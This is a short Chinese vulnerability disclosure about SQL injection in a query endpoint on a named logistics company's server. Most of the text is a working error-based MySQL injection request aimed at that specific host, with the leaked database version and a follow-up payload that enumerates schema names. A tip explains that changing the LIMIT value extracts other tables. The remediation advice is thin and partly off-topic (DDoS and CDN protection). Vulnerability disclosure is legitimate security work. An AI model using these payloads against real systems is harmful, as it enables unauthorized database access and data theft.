按分拔中心代码查询存在sql注入

code 区域POST /newcar/z/xxcx/card_query_new.php HTTP/1.1

Host: nbsw.yundasys.com:11324



sdate=2015-02-28&edate=2015-03-03&fs=1&pars=225301+and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT version()))a from information_schema.tables group by a)b)&search=%E6%9F%A5%E8%AF%A2

code 区域ERROR:SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '[email protected] ' for key 'group_key'

漏洞证明：code 区域sdate=2015-02-28&edate=2015-03-03&fs=1&pars=225301+and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 3,1)) from information_schema.tables limit 0,1))a from information_schema.tables group by a)b)&search=%E6%9F%A5%E8%AF%A2

暴个表，DDoS防护，谁能告诉我mysql显错注入能够一下把所有的表暴出来 。

修改LIMIT 3,1 暴不同的表。

修复方案：

sql过滤

，高防cdn，CC防御